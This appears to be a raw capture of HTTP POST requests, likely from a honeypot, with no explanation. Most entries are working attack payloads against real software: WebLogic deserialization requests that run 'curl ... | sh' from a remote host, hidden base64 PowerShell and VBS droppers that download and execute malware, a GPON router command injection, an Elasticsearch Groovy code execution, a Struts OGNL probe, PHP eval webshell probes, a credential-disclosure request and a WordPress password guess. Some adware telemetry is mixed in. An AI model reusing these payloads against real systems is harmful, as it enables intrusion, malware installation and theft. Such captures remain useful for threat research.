Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache

E/RawduZZN+AysWOhFb5YxA5aTXovRwSIgctwNIqe5Q0F7PiMgwlMd7d9qYV3HRGCkz65z+57jeXOMZhDX3YkqBkA1wPkh/1GZEEjKEwfgvtGVa/jKSak70Bvxmj/qdXpIEuTv/hA9VdrGr0POSFbRBRiCbNRK/O35MQ4k60t4Otf/Xvkv6GqFJ4NoocMs2ejI/tzxtTcu6xBFuz2RR/JLyEeOkgjr1qFNcn5U8HNj1VFcv/san0P4TYq7sDnugCig5yQMdvhEGKGLdFlG2exQw3vwRiXQ2oDegcozDv1t/uVPKOwe0POyhIXyH2OoM+0ezYGsQNkwjrBjDiLqQiVTbs9Z7r3HhXLWH/at6YndYY5kX8Trvx

POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /sdk HTTP/1.1
Connection: close
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Length: 441

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1081
Content-Type: multipart/form-data; boundary=L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

993504
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

a09d865b923b4656a82b7e83f3d782ab
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--L3CO3NwO0QVtX2HfFehslaZIrKC1TPd9QQFidJT4--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 20
Cache-Control: no-cache

log=admin&pwd=258852

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://cmdts.ksmobile.com/c/ HTTP/1.1
Content-Length: 120
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: cmdts.ksmobile.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded

x
Ú∫˘'	MÆ˛

¡Ã◊·Êr4ŒwæÎÎÎΩ∫È∞∏º∞∫πºÓó◊4Y–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏|ó◊4Y

POST /wc.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

1=die('Hello, Peppa!'.(string)(111111111*9));

POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1057
Content-Type: multipart/form-data; boundary=IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

539893
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

13b7aeee7b8deaf63deb15a58cbb166c
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--IWppf-RP5M4yjUNF8FPCGYtmO0RDAY0eRbsL--


POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60

A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23



POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

eval=die((string)(111111111*9));

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
Á*4?Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îzûY›∆√«∆fl

POST http://f2.doodlemobile.com/feature_server/geo-ip/test.php HTTP/1.1
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Host: f2.doodlemobile.com
Connection: Keep-Alive



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache

FvBbxdvANuTXV1DuCgtRhVsKTUrnWRa7PbyOoi0VI8t3vqMJvrtftXf8D9lY2DqZA4bZymBOyq8bIjumHzWPyag+OSowPxYkiFOe2J2M/nqDqrQOW1rSgLNUkTd573Z9lTouk2T4lxNQiCprpFzoZl0t0BWpKpR5ooYvaovGK2v46USRSZecet7sbP+0zki0S4kgX2fsWQE8VzvSqOmbN7gR692snuPhb091lRvOJaO7EvzIcUsXMMd3iXsy1/t4mB4TicOpXgyGu8w8Rn+NRGrrYZG5eBfVxrE4wX+RxX73nmd7BCwGa0udT69nIvSt8rOYMtTNZ7HQ8s53Lfgnzm722MNEOOxexBW/y5hFVLzpBb85e5gvLSK5PvKqMagXUnFciDVEp5eKBkeV

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache

QqAPkN/OYif8JQgkXSL8wdj3lu9MhFEWlvSKmSlihRG7Q4QZAT9l/aGpn1c/aiGYB7WDwD05SznR08xuvMoDIb/t2jKMMadBtxeP+PhtuMFFN+wW5g4b+TUCSoYlgt52hBod0JvcQjwZAQFaObNxZlRDbuiQAeqQfxnRbb4zxz4y3G07Th7j5LUeWIs9eihOiRF9LDQFxov400c6QWrd1qEZ/h+Pq3DhkzNVNULZ3MAM4aPkLU67nJBe7C/6K7R8TTuJSnJoW2JzUCHHLQyCK4Qhc9k/dJz/CIZUNYoizOqSP0mHP5I1ALbyUt/QqQHuTbrKfC2Bcm/uOugutUyqDVNpSMeIc9PUnol+6xhWJhMYvNDnSevXtX+TuUPaIGwsC2BsI1OHrY7sXQ==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 384
Cache-Control: no-cache

FvFYkNPJZgjx8tuuucIIEdXLVKV1KarAYU7c4m/Vmeg7RBxIC6LP3SMPYjLECOyeI1Ag+iVgJGirEqkRE+dCSiBpJGxHgZKue1AXG55LCZF6qLmEs1o4bIvH7JLvNns7YPBhBg3Bq1PkaLb1iTs0WKGEBlC/oy0S77JePy5lV49RlEWG3m8zLYE/Mqx4tj3Ae48tAbdE6VWLzStoQOZzdz4sxbBQjU2ZuW61n02UtIuq3y8xw6QWl0dGBICEWhFoeBgfgE4b/fJvdu4MDoNSw8BlAQqjJgW8tTH+SQQ98swm4BcYyV4OsBoQVYUKfw6W19/gE8KpLA6VHFQK58KccozFMn1v3tYADHLglEnlUoVOHQ8+UbdKSJl8cYZ3Ggla

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
l÷yyÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìD!Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /login.action HTTP/1.1
Host:64.137.249.101:80
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 471
Content-Type: application/x-www-form-urlencoded

redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()}

POST http://check.proxyradar.com/azenv.php?auth=149611755585&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /onvif/device_service HTTP/1.1
Host: x.x.x.x:80
User-Agent: gSOAP/2.8
Content-Length: 1889
Connection: close
Content-Type: application/soap+xml; charset=utf-8; action="http://www.onvif.org/ver10/device/wsdl/GetDeviceInformation"
Soapaction: "http://www.onvif.org/ver10/device/wsdl/GetDeviceInformation"
Accept-Encoding: gzip
Connection: close


<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsdd="http://schemas.xmlsoap.org/ws/2005/04/discovery" xmlns:chan="http://schemas.microsoft.com/ws/2005/02/duplex" xmlns:wsa5="http://www.w3.org/2005/08/addressing" xmlns:OLD-SOAP-ENV="http://tempuri.org/OLD-SOAP-ENV.xsd" xmlns:c14n="http://www.w3.org/2001/10/xml-exc-c14n#" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" xmlns:wsc="http://schemas.xmlsoap.org/ws/2005/02/sc" xmlns:ds="http://www.w3.org/2000/09/xmldsig#" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:xmime="http://tempuri.org/xmime.xsd" xmlns:xop="http://www.w3.org/2004/08/xop/include" xmlns:tt="http://www.onvif.org/ver10/schema" xmlns:wsrfbf="http://docs.oasis-open.org/wsrf/bf-2" xmlns:wstop="http://docs.oasis-open.org/wsn/t-1" xmlns:wsrfr="http://docs.oasis-open.org/wsrf/r-2" xmlns:tds="http://www.onvif.org/ver10/device/wsdl">
	<SOAP-ENV:Header>
		<wsse:Security SOAP-ENV:mustUnderstand="true">
			<wsse:UsernameToken wsu:Id="">
				<wsse:Username>admin</wsse:Username>
